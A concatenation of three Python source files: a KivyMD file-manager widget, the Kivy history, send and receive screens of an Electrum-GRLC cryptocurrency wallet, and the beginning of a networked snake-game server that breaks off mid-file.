from kivy.uix.floatlayout import FloatLayout
from kivy.lang import Builder
from kivy.uix.image import AsyncImage
from kivy.properties import ObjectProperty, StringProperty, ListProperty, \
BooleanProperty, NumericProperty, OptionProperty
import kivymd.material_resources as m_res
from kivymd import images_path
from kivymd.list import ILeftBodyTouch, ILeftBody, IRightBody, IRightBodyTouch
from kivymd.font_definitions import theme_font_styles
from kivymd.ripplebehavior import RectangularRippleBehavior, \
CircularRippleBehavior
from kivymd.theming import ThemableBehavior
from kivymd.button import MDIconButton
ACTIVITY_MANAGER = '''
#:import os os
#:import Window kivy.core.window.Window
#:import MDToolbar kivymd.toolbar.MDToolbar
#:import MDFloatingActionButton kivymd.button.MDFloatingActionButton
#:import MDSeparator kivymd.cards.MDSeparator
<BodyManager@BoxLayout>
icon: 'folder'
path: ''
background_normal: ''
background_down: ''
dir_or_file_name: ''
access_string: ''
events_callback: lambda x: None
orientation: 'vertical'
ModifiedOneLineIconListItem:
text: root.dir_or_file_name
on_release: root.events_callback(root.path)
IconFolder:
disabled: True
icon: root.icon
MDSeparator:
<LabelContent@MDLabel>
size_hint_y: None
height: self.texture_size[1]
shorten: True
shorten_from: 'center'
halign: 'center'
text_size: self.width, None
<BodyManagerWithPrevious>
paths: []
path: ''
type: 'folder'
events_callback: lambda x: None
GridLayout:
id: grid_box
cols: 3
row_default_height: (self.width - self.cols*self.spacing[0])/self.cols
row_force_default: True
size_hint_y: None
height: self.minimum_height
padding: dp(4), dp(4)
spacing: dp(4)
BoxLayout:
orientation: 'vertical'
IconButton:
mipmap: True
source:
root.get_source(\
app, root.type, label_box_1, root.paths, 1, self)
on_release:
root.events_callback(\
os.path.join(root.path, label_box_1.text))
LabelContent:
id: label_box_1
text:
os.path.split(root.paths[0])[1].replace('thumb_', '')\
if len(root.paths) >= 1 else ''
BoxLayout:
orientation: 'vertical'
IconButton:
mipmap: True
source:
root.get_source(\
app, root.type, label_box_2, root.paths, 2, self)
on_release:
root.events_callback(\
os.path.join(root.path, label_box_2.text))
LabelContent:
id: label_box_2
text:
os.path.split(root.paths[1])[1].replace('thumb_', '')\
if len(root.paths) >= 2 else ''
BoxLayout:
orientation: 'vertical'
IconButton:
mipmap: True
source:
root.get_source(\
app, root.type, label_box_3, root.paths, 3, self)
on_release:
root.events_callback(\
os.path.join(root.path, label_box_3.text))
LabelContent:
id: label_box_3
text:
os.path.split(root.paths[2])[1].replace('thumb_', '')\
if len(root.paths) >= 3 else ''
<FloatButton>
anchor_x: 'right'
anchor_y: 'bottom'
size_hint_y: None
height: dp(56)
padding: dp(10)
MDFloatingActionButton:
size_hint: None, None
size:dp(56), dp(56)
icon: root.icon
opposite_colors: True
elevation: 8
on_release: root.callback()
md_bg_color: root.md_bg_color
<MDFileManager>
canvas:
Color:
rgba:
1, 1, 1, 1
Rectangle:
size: self.size
pos: self.pos
BoxLayout:
orientation: 'vertical'
spacing: dp(5)
MDToolbar:
id: toolbar
title: '%s' % root.current_path
right_action_items: [['close-box', lambda x: root.exit_manager(1)]]
left_action_items: [['chevron-left', lambda x: root.back()]]
elevation: 10
md_bg_color: root.theme_cls.primary_color
RecycleView:
id: rv
key_viewclass: 'viewclass'
key_size: 'height'
bar_width: dp(4)
bar_color: root.theme_cls.primary_color
on_scroll_stop: root.update_list_images()
RecycleBoxLayout:
padding: dp(10)
default_size: None, dp(48)
default_size_hint: 1, None
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
<ModifiedBaseListItem>
size_hint_y: None
canvas:
Color:
rgba:
self.theme_cls.divider_color if root.divider is not None\
else (0, 0, 0, 0)
Line:
points: (root.x ,root.y, root.x+self.width, root.y)\
if root.divider == 'Full' else\
(root.x+root._txt_left_pad, root.y,\
root.x+self.width-root._txt_left_pad-root._txt_right_pad,\
root.y)
BoxLayout:
id: _text_container
orientation: 'vertical'
pos: root.pos
padding:
root._txt_left_pad, root._txt_top_pad,\
root._txt_right_pad, root._txt_bot_pad
MDLabel:
id: _lbl_primary
text: root.text
font_style: root.font_style
theme_text_color: root.theme_text_color
size_hint_y: None
shorten: True
max_lines: 1
height: self.texture_size[1]
<ModifiedOneLineIconListItem>
BoxLayout:
id: _left_container
size_hint: None, None
x: root.x + dp(16)
y: root.y + root.height/2 - self.height/2
size: dp(48), dp(48)
'''
class IconButton(CircularRippleBehavior, ButtonBehavior, AsyncImage):
pass
class FloatButton(AnchorLayout):
callback = ObjectProperty()
md_bg_color = ListProperty([1, 1, 1, 1])
icon = StringProperty()
class ModifiedBaseListItem(ThemableBehavior, RectangularRippleBehavior,
ButtonBehavior, FloatLayout):
"""Base class to all ListItems. Not supposed to be instantiated on its own.
"""
text = StringProperty()
"""Text shown in the first line.
:attr:`text` is a :class:`~kivy.properties.StringProperty` and defaults
to "".
"""
text_color = ListProperty(None)
"""Text color used if theme_text_color is set to 'Custom'"""
font_style = OptionProperty('Subtitle1', options=theme_font_styles)
theme_text_color = StringProperty('Primary', allownone=True)
"""Theme text color for primary text"""
secondary_text = StringProperty()
"""Text shown in the second and potentially third line.
The text will wrap into the third line if the ListItem's type is set to
\'one-line\'. It can be forced into the third line by adding a \\n
escape sequence.
:attr:`secondary_text` is a :class:`~kivy.properties.StringProperty` and
defaults to "".
"""
secondary_text_color = ListProperty(None)
"""Text color used for secondary text if secondary_theme_text_color
is set to 'Custom'"""
secondary_theme_text_color = StringProperty('Secondary', allownone=True)
"""Theme text color for secondary primary text"""
secondary_font_style = OptionProperty('Body1', options=theme_font_styles)
divider = OptionProperty('Full', options=['Full', 'Inset', None],
allownone=True)
_txt_left_pad = NumericProperty(dp(16))
_txt_top_pad = NumericProperty()
_txt_bot_pad = NumericProperty()
_txt_right_pad = NumericProperty(m_res.HORIZ_MARGINS)
_num_lines = 2
class ModifiedOneLineListItem(ModifiedBaseListItem):
"""A one line list item"""
_txt_top_pad = NumericProperty(dp(16))
_txt_bot_pad = NumericProperty(dp(15)) # dp(20) - dp(5)
_num_lines = 1
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.height = dp(48)
class ContainerSupport:
"""Overrides add_widget in a ListItem to include support for I*Body
widgets when the appropiate containers are present.
"""
_touchable_widgets = ListProperty()
def add_widget(self, widget, index=0):
if issubclass(widget.__class__, ILeftBody):
self.ids['_left_container'].add_widget(widget)
elif issubclass(widget.__class__, ILeftBodyTouch):
self.ids['_left_container'].add_widget(widget)
self._touchable_widgets.append(widget)
elif issubclass(widget.__class__, IRightBody):
self.ids['_right_container'].add_widget(widget)
elif issubclass(widget.__class__, IRightBodyTouch):
self.ids['_right_container'].add_widget(widget)
self._touchable_widgets.append(widget)
else:
return super().add_widget(widget)
def remove_widget(self, widget):
super().remove_widget(widget)
if widget in self._touchable_widgets:
self._touchable_widgets.remove(widget)
def on_touch_down(self, touch):
if self.propagate_touch_to_touchable_widgets(touch, 'down'):
return
super().on_touch_down(touch)
def on_touch_move(self, touch, *args):
if self.propagate_touch_to_touchable_widgets(touch, 'move', *args):
return
super().on_touch_move(touch, *args)
def on_touch_up(self, touch):
if self.propagate_touch_to_touchable_widgets(touch, 'up'):
return
super().on_touch_up(touch)
def propagate_touch_to_touchable_widgets(self, touch, touch_event, *args):
triggered = False
for i in self._touchable_widgets:
if i.collide_point(touch.x, touch.y):
triggered = True
if touch_event == 'down':
i.on_touch_down(touch)
elif touch_event == 'move':
i.on_touch_move(touch, *args)
elif touch_event == 'up':
i.on_touch_up(touch)
return triggered
class ModifiedOneLineIconListItem(ContainerSupport, ModifiedOneLineListItem):
_txt_left_pad = NumericProperty(dp(72))
class IconFolder(ILeftBodyTouch, MDIconButton):
pass
class BodyManagerWithPrevious(BoxLayout):
def get_source(self, app, source_type, instance_label, paths, index,
instance_content):
if source_type == 'folder' and instance_label.text != '':
source = f'{images_path}folder.png'
else:
if len(paths) >= index:
source = paths[index - 1]
else:
source = f'{images_path}transparent.png'
if PY2:
return source.decode('u8')
return source
# FIXME: Add color for Black and White theme
# FIXME: When you first create the application cache,
# it crashes after a while with error:
'''
Traceback (most recent call last):
File "/home/kivy/Projects/KivyMD/demos/kitchen_sink/main.py", line 1698,
in <module>
KitchenSink().run()
File "/usr/lib/python3/dist-packages/kivy/app.py", line 826, in run
runTouchApp()
File "/usr/lib/python3/dist-packages/kivy/base.py", line 502, in runTouchApp
EventLoop.window.mainloop()
File "/usr/lib/python3/dist-packages/kivy/core/window/window_sdl2.py",
line 727, in mainloop
self._mainloop()
File "/usr/lib/python3/dist-packages/kivy/core/window/window_sdl2.py",
line 460, in _mainloop
EventLoop.idle()
File "/usr/lib/python3/dist-packages/kivy/base.py", line 337, in idle
Clock.tick()
File "/usr/lib/python3/dist-packages/kivy/clock.py", line 581, in tick
self._process_events()
File "kivy/_clock.pyx", line 384,
in kivy._clock.CyClockBase._process_events (kivy/_clock.c:7839)
File "kivy/_clock.pyx", line 414,
in kivy._clock.CyClockBase._process_events (kivy/_clock.c:7597)
File "kivy/_clock.pyx", line 412,
in kivy._clock.CyClockBase._process_events (kivy/_clock.c:7519)
File "kivy/_clock.pyx", line 167,
in kivy._clock.ClockEvent.tick (kivy/_clock.c:3248)
File "/usr/lib/python3/dist-packages/kivy/cache.py",
line 212, in _purge_by_timeout
lastaccess = Cache._objects[category][key]['lastaccess']
KeyError: '/path/to/image'
'''
class MDFileManager(ThemableBehavior, FloatLayout):
icon = StringProperty('check')
'''The icon that will be used on the directory selection button.'''
exit_manager = ObjectProperty(lambda x: None)
'''Function called when the user reaches directory tree root.'''
select_path = ObjectProperty(lambda x: None)
'''Function, called when selecting a file/directory.'''
ext = ListProperty()
'''List of file extensions to be displayed
in the manager. For example, ['py', 'kv'] - will filter out all files,
except python scripts and Kv Language.'''
search = StringProperty('all')
'''It can take the values 'dirs' 'files' - display only directories
or only files. By default, it displays and folders, and files.'''
current_path = StringProperty('/')
'''Current directory.'''
use_access = BooleanProperty(True)
'''Show accec to files and directories.'''
previous = BooleanProperty(False)
'''Shows only image previews.'''
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.history = [] # directory navigation history
# If False - do not add a directory to the history -
# The user moves down the tree.
self.history_flag = True
toolbar_label = self.ids.toolbar.children[1].children[0]
toolbar_label.font_style = 'Subtitle1'
if self.previous:
self.ext = ['.png', '.jpg', '.jpeg']
self.app = App.get_running_app()
if not os.path.exists('%s/thumb' % self.app.user_data_dir):
os.mkdir('%s/thumb' % self.app.user_data_dir)
else:
action_button = FloatButton(
callback=self.select_directory_on_press_button,
md_bg_color=self.theme_cls.primary_color,
icon=self.icon)
self.add_widget(action_button)
def update_list_images(self):
self.ids.rv.refresh_from_layout()
def split_list(self, l, n):
n = max(1, n)
if PY2:
return (l[i:i + n] for i in xrange(0, len(l), n))
else:
return (l[i:i + n] for i in range(0, len(l), n))
def create_previous(self, path):
for image in os.listdir(path):
_path = os.path.join(path, image)
if os.path.isfile(_path):
if self.count_ext(_path):
path_to_thumb = \
'%s/thumb/thumb_%s' % (self.app.user_data_dir, image)
if not os.path.exists(path_to_thumb):
im = Image.open(os.path.join(path, image))
im.thumbnail((200, 200))
im.save(path_to_thumb, "PNG")
def check_theme(self):
self.canvas.children[0].rgba = [0, 0, 0, 1]\
if self.theme_cls.theme_style == 'Dark' else [1, 1, 1, 1]
def show(self, path):
"""Forms the body of a directory tree."""
self.check_theme()
dirs, files = self.get_content(path)
if self.previous:
threading.Thread(target=self.create_previous, args=(path,)).start()
split_dirs = self.split_list(dirs, 3)
split_files = self.split_list(files, 3)
self.current_path = path
manager_list = []
if dirs == [] and files == []: # selected directory
pass
elif not dirs and not files: # directory is unavailable
return
if self.previous:
for list_dirs in split_dirs:
manager_list.append({
'viewclass': 'BodyManagerWithPrevious',
'path': path,
'paths': list_dirs,
'type': 'folder',
'events_callback': self.select_dir_or_file,
'height': dp(105)
})
for list_files in list(split_files):
manager_list.append({
'viewclass': 'BodyManagerWithPrevious',
'path': path,
'paths': list_files,
'type': 'files',
'events_callback': self.select_dir_or_file,
'height': dp(105)
})
else:
for name in dirs:
_path = path + name if path == '/' else path + '/' + name
access_string = self.get_access_string(_path)
if 'r' not in access_string:
icon = 'folder-lock'
else:
icon = 'folder'
manager_list.append({
'viewclass': 'BodyManager',
'path': _path,
'icon': icon,
'dir_or_file_name': name,
'access_string': access_string,
'events_callback': self.select_dir_or_file
})
for name in files:
_path = path + name if path == '/' else path + '/' + name
manager_list.append({
'viewclass': 'BodyManager',
'path': _path,
'icon': 'file-outline',
'dir_or_file_name': name,
'access_string': self.get_access_string(_path),
'events_callback': self.select_dir_or_file
})
self.ids.rv.data = manager_list
def count_ext(self, path):
ext = os.path.splitext(path)[1]
if ext != '':
if ext.lower() in self.ext or ext.upper() in self.ext:
return True
return False
def get_access_string(self, path):
access_string = ''
if self.use_access:
access_data = {'r': os.R_OK, 'w': os.W_OK, 'x': os.X_OK}
for access in access_data.keys():
access_string += access if os.access(path, access_data[
access]) else '-'
return access_string
def get_content(self, path):
"""Returns a list of the type [[Folder List], [file list]]."""
try:
files = []
dirs = []
if self.history_flag:
self.history.append(path)
if not self.history_flag:
self.history_flag = True
for content in os.listdir(path):
if os.path.isdir('%s/%s' % (path, content)):
if self.search == 'all' or self.search == 'dirs':
dirs.append(content)
else:
if self.search == 'all' or self.search == 'files':
if len(self.ext) != 0:
try:
if self.count_ext(content):
if self.previous:
files.append('%s/thumb/thumb_%s' % (
self.app.user_data_dir, content))
else:
files.append(content)
except IndexError:
pass
else:
files.append(content)
return dirs, files
except OSError:
self.history.pop()
return None, None
def select_dir_or_file(self, path):
"""Called by tap on the name of the directory or file."""
if os.path.isfile(path):
self.history = []
self.select_path(path)
return
self.current_path = path
self.show(path)
def back(self):
"""Returning to the branch down in the directory tree."""
if len(self.history) == 1:
path, end = os.path.split(self.history[0])
if end == '':
self.exit_manager(1)
return
self.history[0] = path
else:
self.history.pop()
path = self.history[-1]
self.history_flag = False
self.select_dir_or_file(path)
def select_directory_on_press_button(self, *args):
self.history = []
self.select_path(self.current_path)
Builder.load_string(ACTIVITY_MANAGER)
|
screens.py
|
import asyncio
from decimal import Decimal
import threading
from typing import TYPE_CHECKING, List, Optional, Dict, Any
from kivy.app import App
from kivy.clock import Clock
from kivy.properties import ObjectProperty
from kivy.lang import Builder
from kivy.factory import Factory
from kivy.uix.recycleview import RecycleView
from electrum_grlc.invoices import (PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING,
PR_PAID, PR_UNKNOWN, PR_EXPIRED, PR_INFLIGHT,
LNInvoice, pr_expiration_values, Invoice, OnchainInvoice)
from electrum_grlc import bitcoin, constants
from electrum_grlc.transaction import tx_from_any, PartialTxOutput
from electrum_grlc.util import (parse_URI, InvalidBitcoinURI, TxMinedInfo, maybe_extract_bolt11_invoice,
InvoiceError, format_time, parse_max_spend)
from electrum_grlc.lnaddr import lndecode, LnInvoiceException
from electrum_grlc.logging import Logger
from .dialogs.confirm_tx_dialog import ConfirmTxDialog
from electrum_grlc.gui.kivy import KIVY_GUI_PATH
from electrum_grlc.gui.kivy.i18n import _
if TYPE_CHECKING:
from electrum_grlc.gui.kivy.main_window import ElectrumWindow
from electrum_grlc.paymentrequest import PaymentRequest
class HistoryRecycleView(RecycleView):
pass
class RequestRecycleView(RecycleView):
pass
class PaymentRecycleView(RecycleView):
pass
class CScreen(Factory.Screen):
__events__ = ('on_activate', 'on_deactivate', 'on_enter', 'on_leave')
action_view = ObjectProperty(None)
kvname = None
app = App.get_running_app() # type: ElectrumWindow
def on_enter(self):
# FIXME: use a proper event don't use animation time of screen
Clock.schedule_once(lambda dt: self.dispatch('on_activate'), .25)
pass
def update(self):
pass
def on_activate(self):
setattr(self.app, self.kvname + '_screen', self)
self.update()
def on_leave(self):
self.dispatch('on_deactivate')
def on_deactivate(self):
pass
# note: this list needs to be kept in sync with another in qt
TX_ICONS = [
"unconfirmed",
"close",
"unconfirmed",
"close",
"clock1",
"clock2",
"clock3",
"clock4",
"clock5",
"confirmed",
]
Builder.load_file(KIVY_GUI_PATH + '/uix/ui_screens/history.kv')
Builder.load_file(KIVY_GUI_PATH + '/uix/ui_screens/send.kv')
Builder.load_file(KIVY_GUI_PATH + '/uix/ui_screens/receive.kv')
class HistoryScreen(CScreen):
tab = ObjectProperty(None)
kvname = 'history'
cards = {}
def __init__(self, **kwargs):
self.ra_dialog = None
super(HistoryScreen, self).__init__(**kwargs)
def show_item(self, obj):
key = obj.key
tx_item = self.history.get(key)
if tx_item.get('lightning') and tx_item['type'] == 'payment':
self.app.lightning_tx_dialog(tx_item)
return
if tx_item.get('lightning'):
tx = self.app.wallet.lnworker.lnwatcher.db.get_transaction(key)
else:
tx = self.app.wallet.db.get_transaction(key)
if not tx:
return
self.app.tx_dialog(tx)
def get_card(self, tx_item): #tx_hash, tx_mined_status, value, balance):
is_lightning = tx_item.get('lightning', False)
timestamp = tx_item['timestamp']
key = tx_item.get('txid') or tx_item['payment_hash']
if is_lightning:
status_str = 'unconfirmed' if timestamp is None else format_time(int(timestamp))
icon = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/lightning'
message = tx_item['label']
fee_msat = tx_item['fee_msat']
fee = int(fee_msat/1000) if fee_msat else None
fee_text = '' if fee is None else 'fee: %d sat'%fee
else:
tx_hash = tx_item['txid']
tx_mined_info = TxMinedInfo(height=tx_item['height'],
conf=tx_item['confirmations'],
timestamp=tx_item['timestamp'])
status, status_str = self.app.wallet.get_tx_status(tx_hash, tx_mined_info)
icon = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/' + TX_ICONS[status]
message = tx_item['label'] or tx_hash
fee = tx_item['fee_sat']
fee_text = '' if fee is None else 'fee: %d sat'%fee
ri = {}
ri['screen'] = self
ri['key'] = key
ri['icon'] = icon
ri['date'] = status_str
ri['message'] = message
ri['fee_text'] = fee_text
value = tx_item['value'].value
if value is not None:
ri['is_mine'] = value <= 0
ri['amount'] = self.app.format_amount(value, is_diff=True)
ri['base_unit'] = self.app.base_unit
if 'fiat_value' in tx_item:
ri['quote_text'] = str(tx_item['fiat_value'])
ri['fx_ccy'] = tx_item['fiat_value'].ccy
return ri
def update(self, see_all=False):
wallet = self.app.wallet
if wallet is None:
return
self.history = wallet.get_full_history(self.app.fx)
history = reversed(self.history.values())
history_card = self.ids.history_container
history_card.data = [self.get_card(item) for item in history]
class SendScreen(CScreen, Logger):
kvname = 'send'
payment_request = None # type: Optional[PaymentRequest]
parsed_URI = None
def __init__(self, **kwargs):
CScreen.__init__(self, **kwargs)
Logger.__init__(self)
self.is_max = False
def set_URI(self, text: str):
if not self.app.wallet:
return
# interpret as lighting URI
bolt11_invoice = maybe_extract_bolt11_invoice(text)
if bolt11_invoice:
self.set_ln_invoice(bolt11_invoice)
# interpret as BIP21 URI
else:
self.set_bip21(text)
def set_bip21(self, text: str):
try:
uri = parse_URI(text, self.app.on_pr, loop=self.app.asyncio_loop)
except InvalidBitcoinURI as e:
self.app.show_info(_("Error parsing URI") + f":\n{e}")
return
self.parsed_URI = uri
amount = uri.get('amount')
self.address = uri.get('address', '')
self.message = uri.get('message', '')
self.amount = self.app.format_amount_and_units(amount) if amount else ''
self.is_max = False
self.payment_request = None
self.is_lightning = False
def set_ln_invoice(self, invoice: str):
try:
invoice = str(invoice).lower()
lnaddr = lndecode(invoice)
except LnInvoiceException as e:
self.app.show_info(_("Invoice is not a valid Lightning invoice: ") + repr(e)) # repr because str(Exception()) == ''
return
self.address = invoice
self.message = dict(lnaddr.tags).get('d', None)
self.amount = self.app.format_amount_and_units(lnaddr.amount * bitcoin.COIN) if lnaddr.amount else ''
self.payment_request = None
self.is_lightning = True
def update(self):
if self.app.wallet is None:
return
_list = self.app.wallet.get_unpaid_invoices()
_list.reverse()
payments_container = self.ids.payments_container
payments_container.data = [self.get_card(invoice) for invoice in _list]
def update_item(self, key, invoice):
payments_container = self.ids.payments_container
data = payments_container.data
for item in data:
if item['key'] == key:
item.update(self.get_card(invoice))
payments_container.data = data
payments_container.refresh_from_data()
def show_item(self, obj):
self.app.show_invoice(obj.is_lightning, obj.key)
def get_card(self, item: Invoice) -> Dict[str, Any]:
status = self.app.wallet.get_invoice_status(item)
status_str = item.get_status_str(status)
is_lightning = item.type == PR_TYPE_LN
key = self.app.wallet.get_key_for_outgoing_invoice(item)
if is_lightning:
assert isinstance(item, LNInvoice)
address = item.rhash
if self.app.wallet.lnworker:
log = self.app.wallet.lnworker.logs.get(key)
if status == PR_INFLIGHT and log:
status_str += '... (%d)'%len(log)
is_bip70 = False
else:
assert isinstance(item, OnchainInvoice)
address = item.get_address()
is_bip70 = bool(item.bip70)
return {
'is_lightning': is_lightning,
'is_bip70': is_bip70,
'screen': self,
'status': status,
'status_str': status_str,
'key': key,
'memo': item.message or _('No Description'),
'address': address,
'amount': self.app.format_amount_and_units(item.get_amount_sat() or 0),
}
def do_clear(self):
self.amount = ''
self.message = ''
self.address = ''
self.payment_request = None
self.is_lightning = False
self.is_bip70 = False
self.parsed_URI = None
self.is_max = False
def set_request(self, pr: 'PaymentRequest'):
self.address = pr.get_requestor()
amount = pr.get_amount()
self.amount = self.app.format_amount_and_units(amount) if amount else ''
self.message = pr.get_memo()
self.locked = True
self.payment_request = pr
def do_paste(self):
data = self.app._clipboard.paste().strip()
if not data:
self.app.show_info(_("Clipboard is empty"))
return
# try to decode as transaction
try:
tx = tx_from_any(data)
tx.deserialize()
except:
tx = None
if tx:
self.app.tx_dialog(tx)
return
# try to decode as URI/address
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
else:
self.set_URI(data)
def read_invoice(self):
address = str(self.address)
if not address:
self.app.show_error(_('Recipient not specified.') + ' ' + _('Please scan a Litecoin address or a payment request'))
return
if not self.amount:
self.app.show_error(_('Please enter an amount'))
return
if self.is_max:
amount = '!'
else:
try:
amount = self.app.get_amount(self.amount)
except:
self.app.show_error(_('Invalid amount') + ':\n' + self.amount)
return
message = self.message
try:
if self.is_lightning:
return LNInvoice.from_bech32(address)
else: # on-chain
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
if not bitcoin.is_address(address):
self.app.show_error(_('Invalid Litecoin Address') + ':\n' + address)
return
outputs = [PartialTxOutput.from_address_and_value(address, amount)]
return self.app.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.parsed_URI)
except InvoiceError as e:
self.app.show_error(_('Error creating payment') + ':\n' + str(e))
def do_save(self):
invoice = self.read_invoice()
if not invoice:
return
self.save_invoice(invoice)
def save_invoice(self, invoice):
self.app.wallet.save_invoice(invoice)
self.do_clear()
self.update()
def do_pay(self):
invoice = self.read_invoice()
if not invoice:
return
self.do_pay_invoice(invoice)
def do_pay_invoice(self, invoice):
if invoice.is_lightning():
if self.app.wallet.lnworker:
amount_sat = invoice.get_amount_sat()
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.app.format_amount_and_units_with_fiat(amount_sat)) +'\n'
self.app.protected(msg, self._do_pay_lightning, (invoice,))
else:
self.app.show_error(_("Lightning payments are not available for this wallet"))
else:
self._do_pay_onchain(invoice)
def _do_pay_lightning(self, invoice: LNInvoice, pw) -> None:
def pay_thread():
try:
coro = self.app.wallet.lnworker.pay_invoice(invoice.invoice, attempts=10)
fut = asyncio.run_coroutine_threadsafe(coro, self.app.network.asyncio_loop)
fut.result()
except Exception as e:
self.app.show_error(repr(e))
self.save_invoice(invoice)
threading.Thread(target=pay_thread).start()
def _do_pay_onchain(self, invoice: OnchainInvoice) -> None:
outputs = invoice.outputs
amount = sum(map(lambda x: x.value, outputs)) if not any(parse_max_spend(x.value) for x in outputs) else '!'
coins = self.app.wallet.get_spendable_coins(None)
make_tx = lambda rbf: self.app.wallet.make_unsigned_transaction(coins=coins, outputs=outputs, rbf=rbf)
on_pay = lambda tx: self.app.protected(_('Send payment?'), self.send_tx, (tx, invoice))
d = ConfirmTxDialog(self.app, amount=amount, make_tx=make_tx, on_pay=on_pay)
d.open()
def send_tx(self, tx, invoice, password):
if self.app.wallet.has_password() and password is None:
return
self.save_invoice(invoice)
def on_success(tx):
if tx.is_complete():
self.app.broadcast(tx)
else:
self.app.tx_dialog(tx)
def on_failure(error):
self.app.show_error(error)
if self.app.wallet.can_sign(tx):
self.app.show_info("Signing...")
self.app.sign_tx(tx, password, on_success, on_failure)
else:
self.app.tx_dialog(tx)
class ReceiveScreen(CScreen):
kvname = 'receive'
def __init__(self, **kwargs):
super(ReceiveScreen, self).__init__(**kwargs)
Clock.schedule_interval(lambda dt: self.update(), 5)
self.is_max = False # not used for receiving (see app.amount_dialog)
def expiry(self):
return self.app.electrum_config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
def clear(self):
self.address = ''
self.amount = ''
self.message = ''
self.lnaddr = ''
def set_address(self, addr):
self.address = addr
def on_address(self, addr):
req = self.app.wallet.get_request(addr)
self.status = ''
if req:
self.message = req.get('memo', '')
amount = req.get('amount')
self.amount = self.app.format_amount_and_units(amount) if amount else ''
status = req.get('status', PR_UNKNOWN)
self.status = _('Payment received') if status == PR_PAID else ''
def get_URI(self):
from electrum_grlc.util import create_bip21_uri
amount = self.app.get_amount(self.amount)
return create_bip21_uri(self.address, amount, self.message)
def do_copy(self):
uri = self.get_URI()
self.app._clipboard.copy(uri)
self.app.show_info(_('Request copied to clipboard'))
def new_request(self, lightning):
amount = self.amount
amount = self.app.get_amount(amount) if amount else 0
message = self.message
lnworker = self.app.wallet.lnworker
try:
if lightning:
if lnworker:
key = lnworker.add_request(amount, message, self.expiry())
else:
self.app.show_error(_("Lightning payments are not available for this wallet"))
return
else:
addr = self.address or self.app.wallet.get_unused_address()
if not addr:
if not self.app.wallet.is_deterministic():
addr = self.app.wallet.get_receiving_address()
else:
self.app.show_info(_('No address available. Please remove some of your pending requests.'))
return
self.address = addr
req = self.app.wallet.make_payment_request(addr, amount, message, self.expiry())
self.app.wallet.add_payment_request(req)
key = addr
except InvoiceError as e:
self.app.show_error(_('Error creating payment request') + ':\n' + str(e))
return
self.clear()
self.update()
self.app.show_request(lightning, key)
def get_card(self, req: Invoice) -> Dict[str, Any]:
is_lightning = req.is_lightning()
if not is_lightning:
assert isinstance(req, OnchainInvoice)
address = req.get_address()
else:
assert isinstance(req, LNInvoice)
address = req.invoice
key = self.app.wallet.get_key_for_receive_request(req)
amount = req.get_amount_sat()
description = req.message
status = self.app.wallet.get_request_status(key)
status_str = req.get_status_str(status)
ci = {}
ci['screen'] = self
ci['address'] = address
ci['is_lightning'] = is_lightning
ci['key'] = key
ci['amount'] = self.app.format_amount_and_units(amount) if amount else ''
ci['memo'] = description or _('No Description')
ci['status'] = status
ci['status_str'] = status_str
return ci
def update(self):
if self.app.wallet is None:
return
_list = self.app.wallet.get_unpaid_requests()
_list.reverse()
requests_container = self.ids.requests_container
requests_container.data = [self.get_card(item) for item in _list]
def update_item(self, key, request):
payments_container = self.ids.requests_container
data = payments_container.data
for item in data:
if item['key'] == key:
status = self.app.wallet.get_request_status(key)
status_str = request.get_status_str(status)
item['status'] = status
item['status_str'] = status_str
payments_container.data = data # needed?
payments_container.refresh_from_data()
def show_item(self, obj):
self.app.show_request(obj.is_lightning, obj.key)
def expiration_dialog(self, obj):
from .dialogs.choice_dialog import ChoiceDialog
def callback(c):
self.app.electrum_config.set_key('request_expiry', c)
d = ChoiceDialog(_('Expiration date'), pr_expiration_values, self.expiry(), callback)
d.open()
class TabbedCarousel(Factory.TabbedPanel):
'''Custom TabbedPanel using a carousel used in the Main Screen
'''
carousel = ObjectProperty(None)
def animate_tab_to_center(self, value):
scrlv = self._tab_strip.parent
if not scrlv:
return
idx = self.tab_list.index(value)
n = len(self.tab_list)
if idx in [0, 1]:
scroll_x = 1
elif idx in [n-1, n-2]:
scroll_x = 0
else:
scroll_x = 1. * (n - idx - 1) / (n - 1)
mation = Factory.Animation(scroll_x=scroll_x, d=.25)
mation.cancel_all(scrlv)
mation.start(scrlv)
def on_current_tab(self, instance, value):
self.animate_tab_to_center(value)
def on_index(self, instance, value):
current_slide = instance.current_slide
if not hasattr(current_slide, 'tab'):
return
tab = current_slide.tab
ct = self.current_tab
try:
if ct.text != tab.text:
carousel = self.carousel
carousel.slides[ct.slide].dispatch('on_leave')
self.switch_to(tab)
carousel.slides[tab.slide].dispatch('on_enter')
except AttributeError:
current_slide.dispatch('on_enter')
def switch_to(self, header):
# we have to replace the functionality of the original switch_to
if not header:
return
if not hasattr(header, 'slide'):
header.content = self.carousel
super(TabbedCarousel, self).switch_to(header)
try:
tab = self.tab_list[-1]
except IndexError:
return
self._current_tab = tab
tab.state = 'down'
return
carousel = self.carousel
self.current_tab.state = "normal"
header.state = 'down'
self._current_tab = header
# set the carousel to load the appropriate slide
# saved in the screen attribute of the tab head
slide = carousel.slides[header.slide]
if carousel.current_slide != slide:
carousel.current_slide.dispatch('on_leave')
carousel.load_slide(slide)
slide.dispatch('on_enter')
def add_widget(self, widget, index=0):
if isinstance(widget, Factory.CScreen):
self.carousel.add_widget(widget)
return
super(TabbedCarousel, self).add_widget(widget, index=index)
|
network.py
|
import socket
from common import constants as c
from common import settings
import json
import threading
from threading import Timer
import select
from common.game import game
import time
import sys
curr_snake_movements = {}
next_snake_id = 1
message_index = 1
time_step = 0
completed_steps = {} # time_step:1
snakes_last_timestamp = {}
snake_timers = {}
started = False
def start_server():
global started
threading.Thread(target=__listen_TCP).start()
print('Waiting for players to join...')
input('Press enter to start the game!\n')
print("Let's goooooo!!!!!")
started = True
msgPacket = {
"type": c.START_GAME,
}
__send_UDP(msgPacket)
i, j = game.get_coord_for_food()
__send_food_spawn(i, j)
def __listen_TCP():
